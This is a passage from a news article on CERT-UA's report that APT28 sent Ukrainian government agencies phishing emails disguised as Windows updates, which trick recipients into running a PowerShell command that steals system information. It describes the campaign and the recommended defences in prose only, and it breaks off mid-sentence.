The Kremlin-backed threat group APT28 is flooding Ukrainian government agencies with email messages about bogus Windows updates in the hope of dropping malware that will exfiltrate system data.
According to the Computer Emergency Response Team of Ukraine (CERT-UA), the advanced persistent threat (APT) group – which also is known as Fancy Bear, Strontium, and Sofacy, among other names – sent emails throughout April with “Windows Update” in the subject line. The messages appeared to have been sent by system administrators of government agencies.
“E-mail addresses of senders created on the public service ‘@outlook.com’ can be formed using the employee’s real surname and initials,” CERT-UA wrote in a brief online note.
Within the messages are instructions written in Ukrainian to update the Microsoft OS “against hacker attacks” and illustrations showing how to launch a command line and execute a PowerShell command.
Executing the command simulates a Windows update but actually downloads and executes a PowerShell script that collects basic system information about using such commands as “tasklist” and “systeminfo”. The information is then sent via a HTTP request to Mocky – a service that mocks APIs to help developers test apps.
CERT-UA has advised government agencies to restrict users from running PowerShell and to monitor network connections to Mocky.
The notorious APT28 group has been around since 2008. The US Cybersecurity and Infrastructure Security Agency (CISA), and security vendors such as Secureworks and Google-owned Mandiant link it to Russia’s GRU intelligence agency.
Fancy Bear has in the